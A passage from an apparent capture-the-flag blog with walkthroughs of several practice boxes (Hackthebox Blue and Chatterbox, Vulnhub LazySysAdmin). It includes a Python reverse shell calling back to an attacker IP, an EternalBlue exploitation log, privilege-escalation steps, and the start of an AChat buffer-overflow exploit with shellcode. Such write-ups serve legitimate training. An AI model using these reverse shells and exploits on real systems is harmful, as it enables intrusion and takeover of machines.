32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}

[/bash]

Of course, this needs to be encoded with base64 to get a strings that this node version can execute.

Et voila, we have local user:

LOCAL USER INFO

Privilege escalation

There is another file in the Documents folder, which is a script containing the following:

print "Script is running..."

I have seen these scripts before and often they lead to root. I changed the script so it would spawn a reverse shell:

print "Script is running..."
print "hey test"
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.XX.XX",8181));os.dup2(s.fileno(),0) 
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

nc -lnvp 8181
listening on [any] 8181 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.85] 46522
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

We are now root!

Alternatively, you can do the following.

I fire up Linux Exploit Suggester 2 to see if there are any obvious exploits to use. Normally this is a dead end, but you never know.

[bash]

./linux-exploit-suggester-2.pl

#############################
Linux Exploit Suggester 2
#############################

Local Kernel: 4.4.0
Searching among 71 exploits…

Possible Exploits:
[+] af_packet
CVE-2016-8655
Source: <a href="https://www.exploit-db.com/exploits/40871/">https://www.exploit-db.com/exploits/40871/</a>
[+] dirty_cow
CVE-2016-5195
Source: <a href="https://www.exploit-db.com/exploits/40616/">https://www.exploit-db.com/exploits/40616/</a>

[/bash]

Wow! Dirty Cow vulnerability. Awesome, we can have root in no time. Make sure that you comment out the incorrect architecture and root is yours in no time. Make sure that you don’t take too much time after the exploit works, since it will probably crash the machine…

Box done.

Being noted as one of the easiest boxes on Hackthebox, I never got around to doing it, since it was already archived when I first joined. It just re-entered circulation as a retired box, I still can get a crack at this one. Lets have a look!

Enumeration

I fired up trusty nmap to get an understanding of the services running on the box:

[bash]

map -sC -sV -oA initial 10.10.10.40
[sudo] password for wieger:
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-04 18:27 UTC
Nmap scan report for 10.10.10.40
Host is up (0.026s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -20m54s, deviation: 34m37s, median: -55s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2018-07-04T19:27:29+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required[/bash]

We see SMB running on this machine. Given that the name of the boxes are often hints on how to pwn the machine, this instantly made me think of EternalBlue, the now famous exploit that was part of the EQUATION GROUP leaks released by The Shadow Brokers in 2017.  Let’s see how we can use nmap to find if the machine is vulnerable. For this, I use the

[bash]–script safe[/bash]

argument which fires all scripts at the machine that are classified as safe by nmap

[bash]

Nmap 7.70 scan initiated Wed Jul 4 18:34:49 2018 as: nmap –script safe -oA safescan 10.10.10.40
Pre-scan script results:
| broadcast-listener:
| ether
| udp
| DHCP6
| ip fqdn
| fe80::185d:f891:e4f7:9751 WIN-IGHS2VQIQ6R.izokvanta.domain
| fe80::a038:3bbf:9a10:ac20 WIN-RMHVPNAC33Q
| fe80::a9c8:85d5:daf:4c0c WIN-HSQ1RC7LI04
|_ fe80::64c8:df41:32e2:e464 servWin12.citicentre.ru
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
|_eap-info: please specify an interface with -e
| lltd-discovery:
| 5.79.113.56
| Hostname: WIN-PFJH6S97DIC
| Mac: 06:1e:58:00:1f:89 (Unknown)
| IPv6: fe80::e1b3:d3c6:70dc:3457
| 5.79.113.57
| Hostname: WIN-T1H804M6I84
| Mac: 06:bc:0a:00:1f:8a (Unknown)
| IPv6: 2001:1af8:4700:a134:7d53:3ce3:6ac6:16ab
|_ Use the newtargets script-arg to add the results as targets
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
Nmap scan report for 10.10.10.40
Host is up (0.031s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown

Host script results:
|_clock-skew: mean: -20m53s, deviation: 34m36s, median: -55s
|_fcrdns: FAIL (No PTR record)
|_ipidseq: Unknown
| msrpc-enum:
|
| uuid: d95afe70-a6d5-4259-822e-2c84da1ddb0d
| tcp_port: 49152
| ip_addr: 0.0.0.0
|
| ncalrpc: LRPC-8f4e4bf86bdde8982b
| uuid: 906b0ce0-c70b-1067-b317-00dd010662da
|
| ncalrpc: LRPC-8f4e4bf86bdde8982b
| uuid: 906b0ce0-c70b-1067-b317-00dd010662da
|_smb-mbenum: Not a master or backup browser
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2018-07-04T19:34:41+01:00
| smb-protocols:
| dialects:
| NT LM 0.12 (SMBv1) [dangerous, but default]
| 2.02
|_ 2.10
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| smb2-capabilities:
| 2.02:
| Distributed File System
| 2.10:
| Distributed File System
| Leasing
|_ Multi-credit operations
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-07-04 18:34:40
|_ start_date: 2018-07-02 00:56:44
| unusual-port:
|_ WARNING: this script depends on Nmap’s service/version detection (-sV)

Post-scan script results:
| reverse-index:
| 135/tcp: 10.10.10.40
| 139/tcp: 10.10.10.40
| 445/tcp: 10.10.10.40
| 49152/tcp: 10.10.10.40
| 49153/tcp: 10.10.10.40
| 49154/tcp: 10.10.10.40
| 49155/tcp: 10.10.10.40
| 49156/tcp: 10.10.10.40
|_ 49157/tcp: 10.10.10.40[/bash]

I trimmed the log somewhat, but there it states that the service is vulnerable for exploit linked to ms17-010. We can achieve the same thing with Metasploit and the auxiliary/scanner/smb/smb_msf17_010 scanner:

[bash]msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)[/bash]

Exploitation

I used the exploit/windows/smb/ms17_010_eternalblue module of Metasploit for this. I set the RHOST to the Blue machine IP, set LHOST to tun0 (my Hackthebox VPN interface) and payload /windows/x64/shell/reverse_tcp. It fails a couple of times, but in the end I get a shell.

[bash]

[*] Started reverse TCP handler on 10.10.14.28:4444
[*] 10.10.10.40:445 – Connecting to target for exploitation.
[+] 10.10.10.40:445 – Connection established for exploitation.
[+] 10.10.10.40:445 – Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 – CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 – 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 – 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 – 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 – Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 – Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 – Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 – Starting non-paged pool grooming
[+] 10.10.10.40:445 – Sending SMBv2 buffers
[+] 10.10.10.40:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 – Sending final SMBv2 buffers.
[*] 10.10.10.40:445 – Sending last fragment of exploit packet!
[*] 10.10.10.40:445 – Receiving response from exploit packet
[+] 10.10.10.40:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 – Sending egg to corrupted connection.
[*] 10.10.10.40:445 – Triggering free of corrupted buffer.
[-] 10.10.10.40:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 – Connecting to target for exploitation.
[+] 10.10.10.40:445 – Connection established for exploitation.
[+] 10.10.10.40:445 – Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 – CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 – 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 – 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 – 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 – Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 – Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 – Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 – Starting non-paged pool grooming
[+] 10.10.10.40:445 – Sending SMBv2 buffers
[+] 10.10.10.40:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 – Sending final SMBv2 buffers.
[*] 10.10.10.40:445 – Sending last fragment of exploit packet!
[*] 10.10.10.40:445 – Receiving response from exploit packet
[+] 10.10.10.40:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 – Sending egg to corrupted connection.
[*] 10.10.10.40:445 – Triggering free of corrupted buffer.

*] Sending stage (336 bytes) to 10.10.10.40
[*] Command shell session 1 opened (10.10.14.28:4444 -> 10.10.10.40:49158) at 2018-07-04 22:08:25 +0200
[+] 10.10.10.40:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

[/bash]

Privilege escalation

None needed:

[bash]

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

[/bash]

Go to

[bash]C:\Users\haris\Desktop[/bash]

for the user key and

[bash]C:\Users\Administrator\Desktop[/bash]

for the root key.

One of the boxes that started me on my journey into CTF’s. Strictly a beginners box, this one can be done without an intermediate techniques, such as reverse shells. The box can be found on Vulnhub. Let’s get started.

Enumeration

[bash]nmap -n -sC -sV -p- -oA initial-nmap 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 20:19 CEST
Nmap scan report for 192.168.56.101
Host is up (0.00012s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.56.102
|_ error: Closing link: (nmap@192.168.56.102) [Client exited]
MAC Address: 08:00:27:0D:C3:62 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel&lt;/pre&gt;
Host script results:
|_clock-skew: mean: -1h20m00s, deviation: 5h46m24s, median: 1h59m58s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: &amp;lt;unknown&amp;gt;, NetBIOS MAC: &amp;lt;unknown&amp;gt; (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2018-06-28T06:19:52+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-06-27 22:19:52
|_ start_date: N/A[/bash]

That’s a lot of sevices. To sum it up:

• 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
• 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
• 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
• 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu
• 3306/tcp open mysql MySQL (unauthorized)
• 6667/tcp open irc InspIRCd

[bash]

gobuster -u 192.168.56.101 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x .html,.pdf,.txt,.cgi,.php

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.56.101/
[+] Threads : 100
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 307,200,204,301,302
[+] Extensions : .html,.pdf,.txt,.cgi,.php
=====================================================
/index.html (Status: 200)
/info.php (Status: 200)
/wordpress (Status: 301)
/test (Status: 301)
/wp (Status: 301)
/apache (Status: 301)
/old (Status: 301)
/javascript (Status: 301)
/robots.txt (Status: 200)
/phpmyadmin (Status: 301)

==================================================

[/bash]

Visiting the /wordpress url delivers the username “My name is togie”

Lets run enum4linux to get some info on the box.

[bash]

enum4linux 192.168.56.101
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 27 21:02:37 2018

==========================
| Target Information |
==========================
Target ……….. 192.168.56.101
RID Range …….. 500-550,1000-1050
Username ……… ”
Password ……… ”
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

======================================================
| Enumerating Workgroup/Domain on 192.168.56.101 |
======================================================
[+] Got domain/workgroup name: WORKGROUP

==============================================
| Nbtstat Information for 192.168.56.101 |
==============================================
Looking up status of 192.168.56.101
LAZYSYSADMIN &lt;00&gt; – B &lt;ACTIVE&gt; Workstation Service
LAZYSYSADMIN &lt;03&gt; – B &lt;ACTIVE&gt; Messenger Service
LAZYSYSADMIN &lt;20&gt; – B &lt;ACTIVE&gt; File Server Service
..__MSBROWSE__. &lt;01&gt; – &lt;GROUP&gt; B &lt;ACTIVE&gt; Master Browser
WORKGROUP &lt;00&gt; – &lt;GROUP&gt; B &lt;ACTIVE&gt; Domain/Workgroup Name
WORKGROUP &lt;1d&gt; – B &lt;ACTIVE&gt; Master Browser
WORKGROUP &lt;1e&gt; – &lt;GROUP&gt; B &lt;ACTIVE&gt; Browser Service Elections

MAC Address = 00-00-00-00-00-00

=======================================
| Session Check on 192.168.56.101 |
=======================================
[+] Server 192.168.56.101 allows sessions using username ”, password ”

=============================================
| Getting domain SID for 192.168.56.101 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can’t determine if host is part of domain or part of a workgroup

========================================
| OS information on 192.168.56.101 |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.56.101 from smbclient:
[+] Got OS info for 192.168.56.101 from srvinfo:
LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
platform_id : 500
os version : 6.1
server type : 0x809a03

===============================
| Users on 192.168.56.101 |
===============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

===========================================
| Share Enumeration on 192.168.56.101 |
===========================================
WARNING: The "syslog" option is deprecated

Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

Server Comment
——— ——-

Workgroup Master
——— ——-
WORKGROUP LAZYSYSADMIN

[+] Attempting to map shares on 192.168.56.101
//192.168.56.101/print$ Mapping: DENIED, Listing: N/A
//192.168.56.101/share$ Mapping: OK, Listing: OK
//192.168.56.101/IPC$ [E] Can’t understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

======================================================
| Password Policy Information for 192.168.56.101 |
======================================================

[+] Attaching to 192.168.56.101 using a NULL share

[+] Trying protocol 445/SMB…

[+] Found domain(s):

[+] LAZYSYSADMIN
[+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

================================
| Groups on 192.168.56.101 |
================================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

=========================================================================
| Users on 192.168.56.101 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username ”, password ”
S-1-22-1-1000 Unix User\togie (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username ”, password ”[/bash]

We see here that there is a local user called ‘togie’ (as noted on /wordpress) and that there is an SMB share that is accessible without a password. Let’s see if we can exploit this.

Exploitation

We can use smbclient to access this share. When it asks for a password, just press Enter.

[bash]smbclient //192.168.56.101/share$
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root’s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 15 13:05:52 2017
.. D 0 Mon Aug 14 14:34:47 2017
wordpress D 0 Tue Aug 15 13:21:08 2017
Backnode_files D 0 Mon Aug 14 14:08:26 2017
wp D 0 Tue Aug 15 12:51:23 2017
deets.txt N 139 Mon Aug 14 14:20:05 2017
robots.txt N 92 Mon Aug 14 14:36:14 2017
todolist.txt N 79 Mon Aug 14 14:39:56 2017
apache D 0 Mon Aug 14 14:35:19 2017
index.html N 36072 Sun Aug 6 07:02:15 2017
info.php N 20 Tue Aug 15 12:55:19 2017
test D 0 Mon Aug 14 14:35:10 2017
old D 0 Mon Aug 14 14:35:13 2017
[/bash]

Sweet! We have access to the web-root. Lets use the ‘get’ command to download deets.txt, todolist.txt and the wp-config.php from the /wordpress site. I normally always get the wp-config.php, since it often contains the MySQL password:

[bash]// ** MySQL settings – You can get this info from your web host ** //
/** The name of the database for WordPress */
define(‘DB_NAME’, ‘wordpress’);

/** MySQL database username */
define(‘DB_USER’, ‘Admin’);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘TogieMYSQL12345^^’);

/** MySQL hostname */
define(‘DB_HOST’, ‘localhost’);[/bash]

I tried the password on the /phpmyadmin page, but it seems like a rabbit hole. Lets view the .txt files we pulled earlier. Todolist.txt says:

[bash] Prevent users from being able to view to web root using the local file browser[/bash]

Deets.txt says:

[bash]

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345[/bash]

Damn, what a lazy admin indeed. So now we have a username (togie) and a password (12345).  Lets see if this allows us to login on the SSH-service:

[bash]

ssh 192.168.56.101 -l togie
##################################################################################################
# Welcome to Web_TR1 #
# All connections are monitored and recorded #
# Disconnect IMMEDIATELY if you are not an authorized user! #
##################################################################################################

togie@192.168.56.101’s password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

* Documentation: https://help.ubuntu.com/

System information disabled due to load higher than 1.0

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$
(ALL : ALL) ALL [/bash]

Privilege Escalation

Lets see what sudo allows us to do:

[bash]sudo -l
[sudo] password for togie:
Matching Defaults entries for togie on LazySysAdmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:

(ALL : ALL) ALL[bash]

Well. that looks like game, set and match:

[bash]togie@LazySysAdmin:~$ sudo su
root@LazySysAdmin:/home/togie# cd /root/
root@LazySysAdmin:~# ls
proof.txt [/bash]

Really enjoyed this box. Quite easy and really helpful in learning the initial skills for CTF!

This box was just retired on Hackthebox.eu. It involves getting to exploit the infamous achat application. Lets see how to get root on this machine!

Enumeration

As always, we start with an nmap scan:

[bash]

nmap -sV -sC -oA initial-nmap 10.10.10.74

[/bash]

The -sU triggers all scripts nmap has against found services , while -sV probes open ports to determine which service/version is running on the box. The -oA makes sure that the output of the scan is stored in all possible formats.

This initial scans resulted in: 0 services. Let cast the net a bit broader and scan all the ports on this machine:

[bash]

nmap -sV -sC -oA fullport-nmap -p- 10.10.10.74

[/bash]

As you can see, I’ve added the -p- trigger in there to scan all ports. We get some nice results back:

[bash]

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 22:40 CEST
Stats: 0:00:33 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.33% done; ETC: 23:03 (0:22:19 remaining)
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 8.69% done; ETC: 23:02 (0:20:19 remaining)
Stats: 0:10:40 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.10.74
Host is up (0.020s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn’t have a title.
9256/tcp open achat AChat chat system

[/bash]

Exploitation

So we have AChat running on both port 9255 and 9256. Lets do a quick Google on this piece of software. The sourceforge page linked to the project shows that the last commit was made in 2013, which brings the latest version to 0.150. We can safely assume that Chatterbox is running that version of AChat. Lets see what exploitdb has on this.

[bash]

searchsploit achat
————————————————————————————-
Exploit Title | Path
| (/usr/share/exploitdb/)
————————————————————————————-
Achat 0.150 beta7 – Remote Buffer Overflow | exploits/windows/remote/36025.py
Achat 0.150 beta7 – Remote Buffer Overflow (Metasploit) | exploits/windows/remote/36056.rb
MataChat – ‘input.php’ Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32958.txt
Parachat 5.5 – Directory Traversal | exploits/php/webapps/24647.txt
————————————————————————————-
Shellcodes: No Result

[/bash]

We have multiple hits. Cool. Lets start by looking at the non Metasploit exploit (36025.py):

[bash]
!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 – Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 –platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python
#Payload size: 512 bytes

buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
